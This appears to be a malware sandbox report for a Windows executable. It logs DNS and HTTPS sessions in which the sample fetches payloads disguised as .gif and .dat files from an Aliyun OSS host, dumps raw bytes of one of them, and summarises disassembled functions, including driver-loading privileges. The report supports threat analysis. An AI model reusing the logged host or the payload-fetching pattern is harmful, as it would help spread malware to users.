                                            Jan 9, 2025 04:28:41.284364939 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.284425020 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.284431934 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.284488916 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.284544945 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.284549952 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.284599066 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.470263004 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.470290899 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.470319986 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.470335960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.470354080 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.470506907 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.470516920 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.470607042 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.470678091 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.470686913 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.470746040 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.675332069 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.678442001 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.707328081 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.707350016 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.707364082 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.707371950 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.707446098 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.707454920 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.707465887 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.707534075 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.707540035 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.707585096 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.738934040 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.738975048 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.738993883 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.739005089 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.739113092 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.739123106 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.739183903 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.739190102 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.739332914 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.739340067 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.739360094 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.739366055 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.739389896 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.739438057 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.947335005 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.948487997 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.973254919 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:41.973284960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.973305941 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:41.973447084 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.179343939 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.179470062 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.297254086 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.297280073 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.297313929 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.297332048 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.297338009 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.297519922 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.297528982 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.297571898 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.297580004 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.297696114 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.503336906 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.503407955 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.620510101 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.620533943 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.620567083 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.620691061 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:42.620702028 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:42.620745897 CET49685443192.168.2.759.110.190.44
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Jan 9, 2025 04:27:26.991239071 CET | 53 | 65082 | 1.1.1.1 | 192.168.2.7
                                            Jan 9, 2025 04:28:28.391628027 CET | 56996 | 53 | 192.168.2.7 | 1.1.1.1
                                            Jan 9, 2025 04:28:28.444292068 CET | 53 | 56996 | 1.1.1.1 | 192.168.2.7
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Jan 9, 2025 04:28:28.391628027 CET | 192.168.2.7 | 1.1.1.1 | 0xad7f | Standard query (0) | a8mw1y.oss-cn-beijing.aliyuncs.com | A (IP address) | IN (0x0001) | false
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Jan 9, 2025 04:28:28.444292068 CET | 1.1.1.1 | 192.168.2.7 | 0xad7f | No error (0) | a8mw1y.oss-cn-beijing.aliyuncs.com | | 59.110.190.44 | A (IP address) | IN (0x0001) | false
                                            • a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            0 | 192.168.2.7 | 49681 | 59.110.190.44 | 443 | 4476 | C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-01-09 03:28:29 UTC | 111 | OUT | GET /i.dat HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:30 UTC | 557 | IN | HTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:29 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 512
                                            Connection: close
                                            x-oss-request-id: 677F425D8797BE32335B61A7
                                            Accept-Ranges: bytes
                                            ETag: "C3BE870A726F627202B33B6AAD385CC2"
                                            Last-Modified: Wed, 08 Jan 2025 11:05:12 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 253241388760715353
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000113
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: w76HCnJvYnICsztqrThcwg==
                                            x-oss-server-time: 16


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            1 | 192.168.2.7 | 49682 | 59.110.190.44 | 443 | 4476 | C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-01-09 03:28:31 UTC | 111 | OUT | GET /a.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:31 UTC | 546 | IN | HTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:31 GMT
                                            Content-Type: image/gif
                                            Content-Length: 135589
                                            Connection: close
                                            x-oss-request-id: 677F425FF326DB39341EAF5B
                                            Accept-Ranges: bytes
                                            ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 8642451798640735006
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                            x-oss-server-time: 22


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            2 | 192.168.2.7 | 49683 | 59.110.190.44 | 443 | 4476 | C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-01-09 03:28:33 UTC | 111 | OUT | GET /b.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:34 UTC | 547 | IN | HTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:34 GMT
                                            Content-Type: image/gif
                                            Content-Length: 125333
                                            Connection: close
                                            x-oss-request-id: 677F42616AD6D5343207A7BA
                                            Accept-Ranges: bytes
                                            ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 10333201072197591521
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                            x-oss-server-time: 29
                                            2025-01-09 03:28:34 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                            Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                            2025-01-09 03:28:34 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                            Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                            2025-01-09 03:28:34 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                            Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                            2025-01-09 03:28:34 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                            Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                            2025-01-09 03:28:34 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                            Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            3 | 192.168.2.7 | 49684 | 59.110.190.44 | 443 | 4476 | C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-01-09 03:28:36 UTC | 111 | OUT | GET /c.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:36 UTC | 546 | IN | HTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:36 GMT
                                            Content-Type: image/gif
                                            Content-Length: 10681
                                            Connection: close
                                            x-oss-request-id: 677F42641253C530358B113C
                                            Accept-Ranges: bytes
                                            ETag: "10A818386411EE834D99AE6B7B68BE71"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 10287299869673359293
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                            x-oss-server-time: 22


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.7 | 49685 | 59.110.190.44 | 443 | 4476 | C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-01-09 03:28:37 UTC | 111 | OUT | GET /d.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:38 UTC | 547 | IN | HTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:38 GMT
                                            Content-Type: image/gif
                                            Content-Length: 3892010
                                            Connection: close
                                            x-oss-request-id: 677F42655DFDD1373116FAC5
                                            Accept-Ranges: bytes
                                            ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:19 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 3363616613234190325
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                            x-oss-server-time: 44


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.7 | 49686 | 59.110.190.44 | 443 | 4476 | C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-01-09 03:28:46 UTC | 111 | OUT | GET /s.dat HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:46 UTC | 559 | IN | HTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:46 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 28272
                                            Connection: close
                                            x-oss-request-id: 677F426E7A62AC34343443D0
                                            Accept-Ranges: bytes
                                            ETag: "B2F6434FC09C8461DE3CEAEE40EAF4AC"
                                            Last-Modified: Thu, 09 Jan 2025 03:28:24 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 4321761407660281176
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000113
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: svZDT8CchGHePOruQOr0rA==
                                            x-oss-server-time: 7


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            6 | 192.168.2.7 | 49687 | 59.110.190.44 | 443 | 4476 | C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2025-01-09 03:28:48 UTC | 111 | OUT | GET /s.jpg HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:48 UTC | 544 | IN | HTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:48 GMT
                                            Content-Type: image/jpeg
                                            Content-Length: 8299
                                            Connection: close
                                            x-oss-request-id: 677F42709932F13631DB3F2E
                                            Accept-Ranges: bytes
                                            ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 692387538176721524
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                            x-oss-server-time: 16


                                            Target ID:0
                                            Start time:22:27:05
                                            Start date:08/01/2025
                                            Path:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\2362476847-83854387.07.exe"
                                            Imagebase:0x140000000
                                            File size:30'958'080 bytes
                                            MD5 hash:D7FBF8A45EA736F05B15DE0C985B343D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Execution Graph
                                            Execution Coverage:2.1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:32%
                                            Total number of Nodes:462
                                            Total number of Limit Nodes:7

                                            Executed Functions

                                            Control-flow Graph (function at 140006c95; API call: NtAllocateVirtualMemory)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524

                                            Control-flow Graph

                                            [Control-flow graph beginning at 1400073e0, where LdrLoadDll is called]
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: File$CreateReadmalloc
                                            • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                            • API String ID: 3950102678-3381721293

                                            Control-flow Graph

                                            [Control-flow graph beginning at 7ffb23b01c00]
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0

                                            Control-flow Graph

                                            APIs
                                            • FreeConsole.KERNEL32 ref: 00007FFB23B01753
                                            • FreeLibrary.KERNEL32 ref: 00007FFB23B01981
                                              • Part of subcall function 00007FFB23B01B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB23B01BC0
                                              • Part of subcall function 00007FFB23B01B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB23B01BC6
                                              • Part of subcall function 00007FFB23B01720: FindFirstFileA.KERNELBASE ref: 00007FFB23B01536
                                            Strings
                                            • WordpadFilter.db, xrefs: 00007FFB23B01527
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                            • String ID: WordpadFilter.db
                                            • API String ID: 868324331-3647581008

                                            Control-flow Graph

                                            [Control-flow graph beginning at 7ffb23b011b0]
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                            • String ID:
                                            • API String ID: 73155330-0

                                            Non-executed Functions

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                            • String ID:
                                            • API String ID: 3526400053-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                            • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                            • API String ID: 3408796845-4213300970
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
